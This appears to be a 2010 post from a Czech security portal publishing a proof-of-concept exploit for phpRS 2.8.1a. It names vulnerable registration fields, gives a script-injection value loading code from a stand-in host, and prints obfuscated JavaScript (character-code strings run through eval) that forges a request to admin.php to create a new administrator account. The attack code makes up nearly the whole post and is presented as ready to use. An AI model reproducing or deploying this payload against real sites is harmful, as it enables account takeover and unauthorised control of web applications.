Navigace

Náhodný obsah

Operace SWORDFISH 2 (34,530)
Novinky z programu Lidska prava a technologie (31,289)
Konference IT underground 2008 (33,088)
Registrujte se na Security Session 2016 (92,348)
Rozdělování IP sítí (123,659)
Databáze SP byla přesunuta na Percona MySQL 5.1 (47,481)
Report z konference 27c3 (CCC) - den první (30,006)

další

Tagy

více tagů

RSS Feed

Security-Portal.cz
SP - Aktuality
SP - Usr Blogy
Fórum Security-Portal.cz
RSS Feed Aggregator:
Blogy
GNU/Linux
IT News
Hacking
Exploits

phpRS 2.8.1a XSRF POC EXPLOIT

Vložil/a 4194, 29 Leden, 2010 - 12:20

Exploit

PHPRS 2.8.1A XSRF POC EXPLOIT
VULN: REGISTRATION (readers.php), INPUTS ‘rcelejmeno’ && ‘rmail’
VALUE: “-</td><script src=http://ev.il/xpl.js />”
AUTHOR: 4194
EXPLOIT_DESCRIPTION: creating new admin account

function exploit () {

// post data

var pd = ‘pruser=usr&prheslo=******&prheslo2=******&prjme’+

‘no=usr&prmail=usr@owned.ya&prurl=http://lol.cz’+

‘&prim=100000001&prblokace=0&prprava=2&prjazyk=cz&akce=AcAddUser’+

‘&modul=users’;

// xhr init function

var xif = String.fromCharCode(102,117,110,99,116,105,111,110,32,99,

114,101,97,116,101,82,101,113,117,101,115,116,79,98,106,101,99,116,

32,40,41,32,123,118,97,114,32,114,101,113,59,105,102,32,40,119,105,

110,100,111,119,46,88,77,76,72,116,116,112,82,101,113,117,101,115,

116,41,32,123,114,101,113,32,61,32,110,101,119,32,88,77,76,72,116,

116,112,82,101,113,117,101,115,116,40,41,59,125,32,101,108,115,101,

32,105,102,40,119,105,110,100,111,119,46,65,99,116,105,118,101,88,

79,98,106,101,99,116,41,32,123,114,101,113,32,61,32,110,101,119,32,

65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,

111,115,111,102,116,46,88,77,76,72,84,84,80,34,41,59,125,32,101,108,

115,101,32,123,114,101,116,117,114,110,32,102,97,108,115,101,59,125,

114,101,116,117,114,110,32,114,101,113,59,125);

// xhr post function

var xpf = String.fromCharCode(102,117,110,99,116,105,111,110,32,112,

111,115,116,32,40,112,97,103,101,44,32,100,97,116,97,41,32,123,118,

97,114,32,104,116,116,112,32,61,32,99,114,101,97,116,101,82,101,113,

117,101,115,116,79,98,106,101,99,116,40,41,59,100,97,116,97,32,61,

32,100,97,116,97,32,43,32,34,38,81,61,34,32,43,32,77,97,116,104,46,

114,97,110,100,111,109,40,41,59,104,116,116,112,46,111,112,101,110,

40,39,80,79,83,84,39,44,32,112,97,103,101,44,32,116,114,117,101,41,

59,104,116,116,112,46,115,101,116,82,101,113,117,101,115,116,72,101,

97,100,101,114,40,34,67,111,110,116,101,110,116,45,116,121,112,101,

34,44,32,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,

119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,

100,34,41,59,104,116,116,112,46,115,101,116,82,101,113,117,101,115,

116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,108,

101,110,103,116,104,34,44,32,100,97,116,97,46,108,101,110,103,116,

104,41,59,104,116,116,112,46,115,101,116,82,101,113,117,101,115,116,

72,101,97,100,101,114,40,34,67,111,110,110,101,99,116,105,111,110,

34,44,32,34,99,108,111,115,101,34,41,59,104,116,116,112,46,111,110,

114,101,97,100,121,115,116,97,116,101,99,104,97,110,103,101,32,61,

32,102,117,110,99,116,105,111,110,40,41,32,123,105,102,40,104,116,

116,112,46,114,101,97,100,121,83,116,97,116,101,32,61,61,32,52,32,

38,38,32,104,116,116,112,46,115,116,97,116,117,115,32,61,61,32,50,

48,48,41,32,123,114,101,116,117,114,110,32,116,114,117,101,59,125,

125,59,104,116,116,112,46,115,101,110,100,40,100,97,116,97,41,59,

104,116,116,112,46,115,101,110,100,40,110,117,108,108,41,59,125);

eval(xif+xpf);

post(”admin.php”, pd);

}

exploit();

<code>